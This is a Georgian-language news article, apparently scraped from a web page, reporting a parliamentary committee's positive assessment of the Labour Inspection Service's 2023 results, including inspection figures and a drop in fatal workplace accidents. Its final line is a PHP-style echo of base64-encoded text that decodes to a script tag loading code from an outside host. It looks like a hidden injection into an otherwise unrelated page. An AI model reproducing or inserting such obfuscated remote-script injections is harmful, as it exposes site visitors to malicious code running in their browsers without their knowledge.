celsiusi
ავერსი საქკაბელი

დარგობრივი ეკონომიკისა და ეკონომიკური პოლიტიკის კომიტეტმა შრომის ინსპექციის სამსახურის 2023 წლის საქმიანობა დადებითად შეაფასა.

მთავარმა შრომის ინსპექტორმა ბექა ფერაძემ თავის გამოსვლაში იმ მნიშვნელოვან შედეგზე ისაუბრა,რომლებიც ინსპექტირებების გაზრდილი ოდენობის,დასაქმებულებსა და დამსაქმებელთან დაბალანსებული, პარტნიორული მიდგომისა და ცნობიერების ამაღლების კამპანიების შედეგად იქნა მიღწეული.

კერძოდ, 2023 წელს შრომის ინსპექციის სამსახურის მიერ შრომის უსაფრთხოების ნორმებსა და შრომით უფლებებზე ზედამხედველობის მიმართულებით 2023 წელს 5544 ინსპექტირება ჩატარდა.

42%ით შემცირდა სამუშაო ადგილზე მომხდარი ფატალური უბედური შემთხვევების მაჩვენებელი.

შრომის უსაფრთხოების მიმართულებით განხორციელებული ინსპექტირებები 82 000-მდე დასაქმებულ პირს შეეხო.

2022 წელთან შედარებით 1,5-ჯერ გაიზარდა პირველადი და განმეორებითი ინსპექტირებების რაოდენობა, ასევე 1,5-ჯერ გაიზარდა შემოწმებული სამუშაო ადგილების ოდენობა.

მნიშვნელოვანია, რომ 23%-ით გაიზარდა იმ ობიექტების რაოდენობა, რომლებმაც პირველივე გადამოწმებისას სრულად აღმოფხვრეს დარღვევები.

რაც შეეხება შრომით უფლებებზე ზედამხედველობას, ამ მიმართულებით ჩატარებული ინსპექტირებები 72 000-მდე დასაქმებულ პირს შეეხო.

67 დამსაქმებელს დაუდგინდა დისკრიმინაციული მოპყრობის ფაქტი.

იძულებითი შრომისა და შრომითი ექსპლუატაციის წინააღმდეგ ბრძოლის მიმართულებით ჩატარდა 300ზე მეტი ინსპექტირება.

სამედიცინო სექტორში მინიმალურ საათობრივ ანაზღაურებაზე ზედამხედველობის მიზნით ჩატარებული ინსპექტირებები, სამედიცინო სექტორში დასაქმებულ 24 000-ზე მეტ პირს შეეხო.

ასევე 2023 წლის სექტემბრიდან, უწყების მანდატს დაემატა შრომითი მიგრაციის შესახებ საქართველოს კანონით განსაზღვრული ნორმების აღსრულებაზე კონტროლი.

2024 წელს, ნარჩუნდება სამუშაო ადგილზე ფატალურ უბედურ შემთხვევათა კლების ტენდენცია და კიდევ უფრო იზრდება ინსპექტირებათა რაოდენობა.

141
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");